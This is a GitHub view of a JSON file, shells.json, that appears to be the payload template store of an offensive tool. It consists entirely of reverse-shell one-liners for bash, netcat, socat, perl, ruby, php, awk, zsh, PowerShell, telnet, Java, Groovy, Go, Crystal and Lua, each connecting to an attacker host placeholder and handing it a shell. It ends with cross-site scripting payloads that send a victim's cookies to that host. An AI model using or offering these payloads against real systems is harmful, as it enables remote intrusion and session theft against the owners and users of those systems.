-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathshells.json
142 lines (142 loc) · 7.31 KB
/
shells.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
{
"bash": {
"i": {
"payload": "bash -i >& /dev/tcp/<<LHOST>>/<<LPORT>> 0>&1"
},
"i_c": {
"payload": "/bin/bash -c 'bash -i >& /dev/tcp/<<LHOST>>/<<LPORT>> 0>&1'"
},
"196": {
"payload": "0<&196;exec 196<>/dev/tcp/<<LHOST>>/<<LPORT>>; bash <&196 >&196 2>&196"
},
"readline": {
"payload": "exec 5<>/dev/tcp/<<LHOST>>/<<LPORT>>;cat <&5 | while read line; do $line 2>&5 >&5; done"
}
},
"nc": {
"mkfifo": {
"payload": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|<<SHELLBIN>> -i 2>&1|nc <<LHOST>> <<LPORT>> >/tmp/f"
},
"e": {
"payload": "nc <<LHOST>> <<LPORT>> -e <<SHELLBIN>>"
},
"c": {
"payload": "nc -c <<SHELLBIN>> <<LHOST>> <<LPORT>>"
}
},
"socat": {
"tcp": {
"payload": "socat TCP:<<LHOST>>:<<LPORT>> EXEC:<<SHELLBIN>>"
},
"tcp-tty": {
"payload": "socat TCP:<<LHOST>>:<<LPORT>> EXEC:'<<SHELLBIN>>',pty,stderr,setsid,sigint,sane"
}
},
"perl": {
"socket": {
"payload": "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"<<LHOST>>:<<LPORT>>\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
},
"socket_bash_i": {
"payload": "perl -e 'use Socket;$i=\"<<LHOST>>\";$p=<<LPORT>>;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"bash -i\");};'"
}
},
"ruby": {
"exec": {
"payload": "ruby -rsocket -e'spawn(\"<<SHELLBIN>>\",[:in,:out,:err]=>TCPSocket.new(\"<<LHOST>>\",<<LPORT>>))'"
},
"solo": {
"payload": "ruby -rsocket -e'exit if fork;c=TCPSocket.new(\"<<LHOST>>\",<<LPORT>>);loop{c.gets.chomp!;(exit! if $_==\"exit\");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts \"failed: #{$_}\"}'"
}
},
"php": {
"r-exec": {
"payload": "php -r '$sock=fsockopen(\"<<LHOST>>\",<<LPORT>>);exec(\"<<SHELLBIN>> <&3 >&3 2>&3\");'"
},
"r-shell_exec": {
"payload": "php -r '$sock=fsockopen(\"<<LHOST>>\",<<LPORT>>);shell_exec(\"<<SHELLBIN>> <&3 >&3 2>&3\");'"
},
"r-system": {
"payload": "php -r '$sock=fsockopen(\"<<LHOST>>\",<<LPORT>>);system(\"<<SHELLBIN>> <&3 >&3 2>&3\");'"
},
"r-passthru": {
"payload": "php -r '$sock=fsockopen(\"<<LHOST>>\",<<LPORT>>);passthru(\"<<SHELLBIN>> <&3 >&3 2>&3\");'"
},
"r-qoute": {
"payload": "php -r '$sock=fsockopen(\"<<LHOST>>\",<<LPORT>>);`<<SHELLBIN>> <&3 >&3 2>&3`'"
},
"r-popen": {
"payload": "php -r '$sock=fsockopen(\"<<LHOST>>\",<<LPORT>>);popen(\"<<SHELLBIN>> <&3 >&3 2>&3\", \"r\");'"
},
"r-procopen": {
"payload": "php -r '$sock=fsockopen(\"<<LHOST>>\",<<LPORT>>);$proc=proc_open(\"<<SHELLBIN>>\", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'"
}
},
"awk": {
"linux": {
"payload": "awk 'BEGIN {s = \"/inet/tcp/0/<<LHOST>>/<<LPORT>>\"; while(42) { do{ printf \"pss>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null"
}
},
"zsh": {
"linux": {
"payload": "zsh -c 'zmodload zsh/net/tcp && ztcp <<LHOST>> <<LPORT>> && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'"
}
},
"powershell": {
"simple": {
"payload": "$a=New-Object System.Net.Sockets.TCPClient('<<LHOST>>',<<LPORT>>);$b=$a.GetStream();[byte[]]$d=0..65535|%{0};while(($e=$b.Read($d,0,$d.Length))-ne 0){;$i=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($d,0,$e);$k=(iex $i 2>&1 | Out-String);$m=$k + 'PS ' +(pwd).Path + '> ';$o=([text.encoding]::ASCII).GetBytes($m);$b.Write($o,0,$o.Length);$b.Flush()};$a.Close()"
},
"simple_2": {
"payload": "$sm=(New-Object Net.Sockets.TCPClient('<<LHOST>>',<<LPORT>>)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}"
},
"simple_3": {
"payload": "$TCPClient = New-Object Net.Sockets.TCPClient('<<LHOST>>',<<LPORT>>);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"
}
},
"telenet": {
"simple": {
"payload": "TF=$(mktemp -u);mkfifo $TF && telnet <<LHOST>> <<LPORT>> 0<$TF | <<SHELLBIN>> 1>$TF"
}
},
"java": {
"runtime-exec-bash-i": {
"payload": "Runtime.getRuntime().exec(\"<<SHELLBIN>> -c $@|<<SHELLBIN>> 0 echo <<SHELLBIN>> -i >& /dev/tcp/<<LHOST>>/<<LPORT>> 0>&1\");"
}
},
"groovy": {
"simple": {
"payload": "String host=\"<<LHOST>>\";int port=<<LPORT>>;String cmd=\"<<SHELLBIN>>\";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();"
}
},
"golang": {
"simple": {
"payload": "echo 'package main;import\"os/exec\";import\"net\";func main(){c,_:=net.Dial(\"tcp\",\"<<LHOST>>:<<LPORT>>\");cmd:=exec.Command(\"<<SHELLBIN>>\");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go"
}
},
"crystal": {
"simple": {
"payload": "crystal eval 'require \"process\";require \"socket\";c=Socket.tcp(Socket::Family::INET);c.connect(\"<<LHOST>>\",<<LPORT>>);loop{m,l=c.receive;p=Process.new(m.rstrip(\"\n\"),output:Process::Redirect::Pipe,shell:true);c<<p.output.gets_to_end}'"
}
},
"lua": {
"simple": {
"payload": "lua -e \"require('socket');require('os');t=socket.tcp();t:connect('<<LHOST>>','<<LPORT>>');os.execute('<<SHELLBIN>> -i <&3 >&3 2>&3');\""
},
"5.1": {
"payload": "lua5.1 -e 'local host, port = \"<<LHOST>>\", <<LPORT>> local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, \"r\") local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()'"
}
},
"html": {
"xss-img-cookie-grab-fetch": {
"payload": "<img src=x onerror='fetch(\"http://<<LHOST>>/?c=\"+document.cookie);' />"
},
"xss-img-cookie-grab": {
"payload": "<img src=x onerror='document.location=\"http://<<LHOST>>/?c=\"+document.cookie;' />"
},
"xss-script-cookie-grab-fetch": {
"payload": "<script type=\"text/javascript\">fetch(\"http://<<LHOST>>/?c=\"+document.cookie);</script>"
},
"xss-script-cookie-grab": {
"payload": "<script type=\"text/javascript\">document.location=\"http://<<LHOST>>/?c=\"+document.cookie;</script>"
}
}
}